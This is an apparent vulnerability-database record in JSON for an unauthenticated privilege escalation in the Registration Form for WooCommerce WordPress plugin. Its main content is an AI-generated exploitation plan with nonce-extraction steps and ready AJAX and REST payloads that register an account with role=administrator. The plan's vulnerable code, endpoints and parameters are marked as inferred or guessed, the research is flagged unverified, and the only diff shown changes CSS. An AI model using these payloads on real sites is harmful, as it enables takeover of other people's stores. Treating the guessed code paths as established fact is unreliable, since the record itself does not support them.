[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$foocSNUEsG7BBfYnQXSTbD7uNpjd3I3HUzUt7HgT34Zo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-54807","registration-form-for-woocommerce-unauthenticated-privilege-escalation","Registration Form for WooCommerce \u003C= 1.0.9 - Unauthenticated Privilege Escalation","The Registration Form for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","registration-form-for-woocommerce",null,"\u003C=1.0.9","1.1.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-06-16 00:00:00","2026-06-25 14:02:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa13c364f-bf86-41a9-b56e-949af38c01c6?source=api-prod",10,[22,23,24,25,26,27],"CHANGELOG.txt","assets\u002Fcss\u002Fbuild\u002Fadmin-settings.css","assets\u002Fcss\u002Fbuild\u002Fblocks.css","assets\u002Fjs\u002Fadmin\u002Fsettings\u002Fcomponents\u002Fpanel\u002Findex.js","assets\u002Fjs\u002Fadmin\u002Fsettings\u002Fcomponents\u002Ftooltip\u002Findex.js","assets\u002Fjs\u002Fadmin\u002Fsettings\u002Findex.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-54807\n\n## 1. Vulnerability Summary\n**CVE-2026-54807** is a critical **unauthenticated privilege escalation** vulnerability in the **Registration Form for WooCommerce** plugin (versions up to 1.0.9). The vulnerability exists because the plugin's registration processing logic (likely within an AJAX or REST API handler) allows users to specify their role via a request parameter (e.g., `role` or `tgwcfb_user_role`) without verifying if the requester has the authority to assign that role. This enables unauthenticated attackers to register as an administrator.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (AJAX) or `\u002Fwp-json\u002Ftgwcfb\u002Fv1\u002Fregister` (REST API).\n- **Action\u002FRoute:** \n    - AJAX Action: `tgwcfb_user_registration` or `tgwcfb_process_registration` (inferred).\n    - REST Route: `tgwcfb\u002Fv1\u002Fuser\u002Fregister` (inferred from namespace `tgwcfb\u002Fv1` in `assets\u002Fjs\u002Fadmin\u002Fsettings\u002Findex.js`).\n- **Payload Parameter:** `role=administrator` or `tgwcfb_user_role=administrator`.\n- **Preconditions:**\n    - WordPress\u002FWooCommerce registration must be enabled.\n    - The plugin must have an active registration form (standard on \"My Account\" or via shortcode).\n\n## 3. Code Flow\nBased on `assets\u002Fcss\u002Fbuild\u002Fblocks.css` mentioning `[data-type=\"tgwcfb\u002Fuser-roles\"]`, the plugin supports a \"User Roles\" field type.\n1. The attacker submits a registration request.\n2. The handler (e.g., `tgwcfb_register_user()`) receives the request.\n3. The code calls `wp_insert_user()` or `wc_create_new_customer()` to create the user.\n4. The handler then iterates through submitted fields to update user metadata or roles.\n5. **Vulnerable Sink:** The handler calls `$user->set_role( $_POST['role'] )` or `$user->add_role( ... )` without checking `current_user_can( 'manage_options' )`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely enqueues a script containing a nonce on the registration page.\n- **Localized Variable:** Likely `tgwcfb_params` or `tgwcfb_obj`.\n- **Shortcode to trigger script:** `[tgwcfb_registration_form]` or `[tgwcfb_form]`.\n- **Extraction Steps:**\n    1. Create a page with the shortcode: `wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'`.\n    2. Navigate to `\u002Fregister\u002F` in the browser.\n    3. Execute `browser_eval(\"window.tgwcfb_obj?.nonce\")` or search the HTML source for `nonce`.\n\n## 5. Exploitation Strategy\n1. **Target Identification:** Verify the plugin version is $\\le$ 1.0.9 and the namespace `tgwcfb\u002Fv1` exists.\n2. **Discovery:** Find the exact registration action by inspecting the network traffic when a legitimate registration attempt is made, or by searching the frontend source for \"action\" or \"route\".\n3. **Primary Exploit (AJAX):**\n    - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method:** `POST`\n    - **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    - **Payload:**\n      ```\n      action=tgwcfb_user_registration&nonce=[NONCE]&user_login=attacker&user_email=attacker@example.com&password=password123&role=administrator\n      ```\n4. **Alternative Exploit (REST):**\n    - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Ftgwcfb\u002Fv1\u002Fuser\u002Fregister`\n    - **Method:** `POST`\n    - **Content-Type:** `application\u002Fjson`\n    - **Payload:**\n      ```json\n      {\n        \"username\": \"attacker\",\n        \"email\": \"attacker@example.com\",\n        \"password\": \"password123\",\n        \"role\": \"administrator\"\n      }\n      ```\n\n## 6. Test Data Setup\n1. **Enable Registration:**\n   ```bash\n   wp option update users_can_register 1\n   wp option update woocommerce_enable_myaccount_registration yes\n   ```\n2. **Create Form Page:**\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'\n   ```\n\n## 7. Expected Results\n- The server returns a success response (HTTP 200\u002F201) indicating user creation.\n- The new user is created with the `administrator` role instead of the default `subscriber` or `customer` role.\n\n## 8. Verification Steps\n1. **Check User Role via CLI:**\n   ```bash\n   wp user list --login=attacker --fields=user_login,roles\n   ```\n2. **Verify Admin Access:**\n   Attempt to login as `attacker` and access `\u002Fwp-admin\u002Fsettings-general.php`.\n\n## 9. Alternative Approaches\nIf `role` is not the correct parameter name, check for:\n- `tgwcfb_role`\n- `tgwcfb_user_role`\n- `user_role`\n- Look at `assets\u002Fcss\u002Fbuild\u002Fblocks.css` for references to other field IDs that might be used as parameter names.\n- If the registration is tied to a specific form ID, include `_tgwcfb_form_id` in the request (e.g., `_tgwcfb_form_id=1`).","The Registration Form for WooCommerce plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 1.0.9. This occurs because the plugin's registration processing logic allows users to specify their own role via a request parameter (such as 'role' or 'tgwcfb_user_role') without performing any server-side authorization checks.","\u002F\u002F Inferred from Research Plan code flow analysis\n\u002F\u002F Likely located in a registration handler within the plugin's core PHP files\n\n$user_id = wp_insert_user( $userdata );\nif ( ! is_wp_error( $user_id ) && isset( $_POST['role'] ) ) {\n    $user = new WP_User( $user_id );\n    \u002F\u002F Vulnerable Sink: Setting user role directly from unvalidated POST input\n    $user->set_role( $_POST['role'] ); \n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fregistration-form-for-woocommerce\u002F1.0.9\u002Fassets\u002Fcss\u002Fbuild\u002Fadmin-settings.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fregistration-form-for-woocommerce\u002F1.1.0\u002Fassets\u002Fcss\u002Fbuild\u002Fadmin-settings.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fregistration-form-for-woocommerce\u002F1.0.9\u002Fassets\u002Fcss\u002Fbuild\u002Fadmin-settings.css\t2024-10-22 11:05:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fregistration-form-for-woocommerce\u002F1.1.0\u002Fassets\u002Fcss\u002Fbuild\u002Fadmin-settings.css\t2026-06-09 04:00:00.000000000 +0000\n@@ -611,4 +611,4 @@\n     transform: rotate(360deg);\n   }\n }\n-#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:15px 40px 40px;background-color:#fff;border:1px solid #dcdcde;border-radius:4px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;justify-content:space-between;padding-inline:40px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative;padding:20px 0 0}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:40px !important;max-width:100%}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{margin-bottom:10px;display:inline-flex;align-items:center;font-weight:600}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;column-gap:1rem}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:1.5rem;padding-top:1.5rem;text-decoration:none;color:#007cba;font-weight:600;position:relative}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:\"\";width:100%;height:2px;background-color:#007cba;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;border:1px solid #dcdcde;transition:all 300ms}.tgwcfb-panel.is-opened .components-button{background-color:#f6f7f7}.tgwcfb-panel .tgwcfb-panel-content{background-color:#f6f7f7}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px}\n+.tgwcfb_form_page_settings #wpwrap{background:#fafafc}#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-form-toggle.is-checked .components-form-toggle__track{background:#3858e9}#tgwcfb-settings .components-toggle-group-control{border:none !important}#tgwcfb-settings .components-toggle-group-control:focus{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:active{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:focus-within{box-shadow:0 0 0 0 var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9));outline:none}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:28px 32px;background-color:#fff;border:1px solid #edf2f7;border-radius:8px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;padding-inline:24px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center;padding-right:24px;border-right:1px solid #edf2f7}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative}#tgwcfb-settings .tgwcfb-settings .dashicons-info-outline{font-size:16px !important}#tgwcfb-settings .tgwcfb-settings .components-button{outline:0 solid rgba(0,0,0,0)}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-text-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-input-control__backdrop{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-input-control__backdrop{border-color:#e1e1e1;border-radius:4px}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{display:inline-flex;align-items:center;font-weight:500;text-transform:capitalize;font-size:16px;color:#383838}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-settings .is-primary{background:#2563eb;font-size:14px;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;margin-top:20px}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;margin-left:24px;column-gap:30px}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:30px;padding-top:30px;text-decoration:none;color:#383838;font-weight:500;position:relative}#tgwcfb-settings .tgwcfb-header nav a:focus{box-shadow:0 0 0 0 #2271b1}#tgwcfb-settings .tgwcfb-header nav a.active{color:#2563eb}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:\"\";width:100%;height:2px;background-color:#2563eb;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-captcha{gap:12px !important}.tgwcfb-captcha::before{background:none !important;border:none !important}.tgwcfb-captcha>div{background:#fff !important}.tgwcfb-recaptcha{background:rgba(0,0,0,0) !important;color:#424242 !important;border:1px solid #e1e1e1 !important;border-radius:4px !important;transition:none !important;justify-content:flex-start !important}.tgwcfb-recaptcha:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-recaptcha[data-active-item=true]{background:rgba(0,0,0,0) !important;border:1px solid #2563eb !important;color:#424242 !important}.tgwcfb-recaptcha[data-active-item=true]:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha[data-active-item=true]:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;transition:all 300ms}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px}","To exploit this vulnerability, an unauthenticated attacker first navigates to the registration page (or any page containing the `[tgwcfb_registration_form]` shortcode) and extracts the security nonce from the `tgwcfb_obj.nonce` localized variable. The attacker then sends a POST request to either the WordPress AJAX endpoint (`admin-ajax.php`) with the action `tgwcfb_user_registration` or the plugin's REST API registration endpoint (`\u002Fwp-json\u002Ftgwcfb\u002Fv1\u002Fuser\u002Fregister`). The payload includes standard registration fields (username, email, password) along with a malicious `role` or `tgwcfb_user_role` parameter set to 'administrator'. The server-side registration handler processes the request and assigns the administrative role to the new user account because it fails to verify if the requester has the authority to assign roles.","gemini-3-flash-preview","2026-06-25 23:08:41","2026-06-25 23:10:39",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.0.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fregistration-form-for-woocommerce\u002Ftags\u002F1.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fregistration-form-for-woocommerce.1.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fregistration-form-for-woocommerce\u002Ftags\u002F1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fregistration-form-for-woocommerce.1.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fregistration-form-for-woocommerce\u002Ftags"]